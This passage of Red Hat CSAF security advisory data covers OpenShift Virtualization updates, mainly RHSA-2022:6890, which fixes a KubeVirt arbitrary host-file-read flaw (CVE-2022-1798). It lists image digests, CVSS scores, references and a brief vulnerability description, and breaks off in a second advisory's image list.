VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-10-11T16:02:33+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6890", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
rhsa-2022:6890
Vulnerability from csaf_redhat
Published
2022-10-11 16:02
Modified
2024-11-22 18:27
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update
Notes
Topic
Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
This advisory contains the following OpenShift Virtualization 4.8.7 images:
RHEL-8-CNV-4.8
==============
vm-import-controller-container-v4.8.7-4
ovs-cni-marker-container-v4.8.7-6
virt-cdi-apiserver-container-v4.8.7-4
virt-cdi-uploadserver-container-v4.8.7-4
virt-cdi-uploadproxy-container-v4.8.7-4
vm-import-virtv2v-container-v4.8.7-4
hostpath-provisioner-container-v4.8.7-4
ovs-cni-plugin-container-v4.8.7-5
bridge-marker-container-v4.8.7-5
virt-cdi-controller-container-v4.8.7-4
node-maintenance-operator-container-v4.8.7-4
cluster-network-addons-operator-container-v4.8.7-5
cnv-containernetworking-plugins-container-v4.8.7-5
virt-cdi-importer-container-v4.8.7-4
vm-import-operator-container-v4.8.7-4
kubemacpool-container-v4.8.7-5
kubevirt-vmware-container-v4.8.7-4
kubevirt-v2v-conversion-container-v4.8.7-4
kubernetes-nmstate-handler-container-v4.8.7-5
virtio-win-container-v4.8.7-4
kubevirt-ssp-operator-container-v4.8.7-3
virt-cdi-operator-container-v4.8.7-4
cnv-must-gather-container-v4.8.7-4
hyperconverged-cluster-operator-container-v4.8.7-4
virt-cdi-cloner-container-v4.8.7-4
hostpath-provisioner-operator-container-v4.8.7-4
hyperconverged-cluster-webhook-container-v4.8.7-4
kubevirt-template-validator-container-v4.8.7-4
virt-handler-container-v4.8.7-5
virt-api-container-v4.8.7-5
virt-operator-container-v4.8.7-5
virt-launcher-container-v4.8.7-5
virt-controller-container-v4.8.7-5
hco-bundle-registry-container-v4.8.7-28
Security Fix(es):
* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Virtualization release 4.8.7 is now available with updates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "This advisory contains the following OpenShift Virtualization 4.8.7 images:\n\nRHEL-8-CNV-4.8\n\n==============\n\nvm-import-controller-container-v4.8.7-4\novs-cni-marker-container-v4.8.7-6\nvirt-cdi-apiserver-container-v4.8.7-4\nvirt-cdi-uploadserver-container-v4.8.7-4\nvirt-cdi-uploadproxy-container-v4.8.7-4\nvm-import-virtv2v-container-v4.8.7-4\nhostpath-provisioner-container-v4.8.7-4\novs-cni-plugin-container-v4.8.7-5\nbridge-marker-container-v4.8.7-5\nvirt-cdi-controller-container-v4.8.7-4\nnode-maintenance-operator-container-v4.8.7-4\ncluster-network-addons-operator-container-v4.8.7-5\ncnv-containernetworking-plugins-container-v4.8.7-5\nvirt-cdi-importer-container-v4.8.7-4\nvm-import-operator-container-v4.8.7-4\nkubemacpool-container-v4.8.7-5\nkubevirt-vmware-container-v4.8.7-4\nkubevirt-v2v-conversion-container-v4.8.7-4\nkubernetes-nmstate-handler-container-v4.8.7-5\nvirtio-win-container-v4.8.7-4\nkubevirt-ssp-operator-container-v4.8.7-3\nvirt-cdi-operator-container-v4.8.7-4\ncnv-must-gather-container-v4.8.7-4\nhyperconverged-cluster-operator-container-v4.8.7-4\nvirt-cdi-cloner-container-v4.8.7-4\nhostpath-provisioner-operator-container-v4.8.7-4\nhyperconverged-cluster-webhook-container-v4.8.7-4\nkubevirt-template-validator-container-v4.8.7-4\nvirt-handler-container-v4.8.7-5\nvirt-api-container-v4.8.7-5\nvirt-operator-container-v4.8.7-5\nvirt-launcher-container-v4.8.7-5\nvirt-controller-container-v4.8.7-5\nhco-bundle-registry-container-v4.8.7-28\n\nSecurity Fix(es):\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs (CVE-2022-1798)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2022:6890", url: "https://access.redhat.com/errata/RHSA-2022:6890", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2022/rhsa-2022_6890.json", }, ], title: "Red Hat Security Advisory: OpenShift Virtualization 4.8.7 Images bug fixes and security update", tracking: { current_release_date: "2024-11-22T18:27:58+00:00", generator: { date: "2024-11-22T18:27:58+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.1", }, }, id: "RHSA-2022:6890", initial_release_date: "2022-10-11T16:02:33+00:00", revision_history: [ { date: "2022-10-11T16:02:33+00:00", number: "1", summary: "Initial version", }, { date: "2022-10-11T16:02:33+00:00", number: "2", summary: "Last updated version", }, { date: "2024-11-22T18:27:58+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "CNV 4.8 for RHEL 8", product: { name: "CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8", product_identification_helper: { cpe: "cpe:/a:redhat:container_native_virtualization:4.8::el8", }, }, }, ], category: "product_family", name: "OpenShift Virtualization", }, { branches: [ { category: "product_version", name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_id: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", product_identification_helper: { purl: "pkg:oci/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubernetes-nmstate-handler-rhel8&tag=v4.8.7-5", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_id: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-v2v-conversion&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_id: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", product_identification_helper: { purl: "pkg:oci/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/kubevirt-vmware&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_id: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", product_identification_helper: { purl: "pkg:oci/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/node-maintenance-operator&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_id: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-controller-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_id: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-operator-rhel8&tag=v4.8.7-4", }, }, }, { category: "product_version", name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_id: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", product_identification_helper: { purl: "pkg:oci/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf?arch=amd64&repository_url=registry.redhat.io/container-native-virtualization/vm-import-virtv2v-rhel8&tag=v4.8.7-4", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", }, product_reference: "container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", }, product_reference: "container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", }, product_reference: "container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", }, product_reference: "container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", }, product_reference: "container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", }, product_reference: "container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, { category: "default_component_of", full_product_name: { name: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64 as a component of CNV 4.8 for RHEL 8", product_id: "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", }, product_reference: "container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", relates_to_product_reference: "8Base-CNV-4.8", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2117872", }, ], notes: [ { category: "description", text: "An arbitrary file read vulnerability was found in the kubeVirt API. This flaw makes it possible to use the kubeVirt API to provide access to host files (like /etc/passwd, for example) in a KubeVirt VM as a disk device that can be written to and read from.", title: "Vulnerability description", }, { category: "summary", text: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1798", }, { category: "external", summary: "RHBZ#2117872", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2117872", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1798", url: "https://www.cve.org/CVERecord?id=CVE-2022-1798", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1798", }, { category: "external", summary: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", url: "https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm", }, ], release_date: "2022-08-08T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-10-11T16:02:33+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6890", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.7, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "CHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-CNV-4.8:container-native-virtualization/kubernetes-nmstate-handler-rhel8@sha256:341fef556b6a09836c040d59cf7eb87136873539e43e2cd8b3a9b023b2efca1f_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-v2v-conversion@sha256:2f9ab9762a6457eba059aa0c805ae29d4258ba844d28ddb4c655d7b5e1528d9a_amd64", "8Base-CNV-4.8:container-native-virtualization/kubevirt-vmware@sha256:177d52a39f5c282d2688423e7ef7393cc43f8d0451ac2a09f022fcc1658be45b_amd64", "8Base-CNV-4.8:container-native-virtualization/node-maintenance-operator@sha256:0e224f1dbedc32d662b2f105ccdba995f9ba84ad5b98ddb1ae178f550e47c9d2_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-controller-rhel8@sha256:2fbbc90d89007801f8d352e0799eafb5dc9509df16555fb2cf2eea59f56b165a_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-operator-rhel8@sha256:d64f5abb3930d56c0409593d7eccca235f53e5e000e8e5ab89c893967f36008d_amd64", "8Base-CNV-4.8:container-native-virtualization/vm-import-virtv2v-rhel8@sha256:4de6feb8458950539861c9e3a0c1e9d70f2f48e2657bb152a7bd6f7d541648bf_amd64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "kubeVirt: Arbitrary file read on the host from KubeVirt VMs", }, ], }
rhsa-2022_6526
Vulnerability from csaf_redhat
Published
2022-09-14 19:28
Modified
2025-01-06 19:21
Summary
Red Hat Security Advisory: OpenShift Virtualization 4.11.0 Images security and bug fix update
Notes
Topic
Red Hat OpenShift Virtualization release 4.11.0 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
This advisory contains the following OpenShift Virtualization 4.11.0 images:
RHEL-8-CNV-4.11
===============
hostpath-provisioner-container-v4.11.0-21
kubevirt-tekton-tasks-operator-container-v4.11.0-29
kubevirt-template-validator-container-v4.11.0-17
bridge-marker-container-v4.11.0-26
hostpath-csi-driver-container-v4.11.0-21
cluster-network-addons-operator-container-v4.11.0-26
ovs-cni-marker-container-v4.11.0-26
virtio-win-container-v4.11.0-16
ovs-cni-plugin-container-v4.11.0-26
kubemacpool-container-v4.11.0-26
hostpath-provisioner-operator-container-v4.11.0-24
cnv-containernetworking-plugins-container-v4.11.0-26
kubevirt-ssp-operator-container-v4.11.0-54
virt-cdi-uploadserver-container-v4.11.0-59
virt-cdi-cloner-container-v4.11.0-59
virt-cdi-operator-container-v4.11.0-59
virt-cdi-importer-container-v4.11.0-59
virt-cdi-uploadproxy-container-v4.11.0-59
virt-cdi-controller-container-v4.11.0-59
virt-cdi-apiserver-container-v4.11.0-59
kubevirt-tekton-tasks-modify-vm-template-container-v4.11.0-7
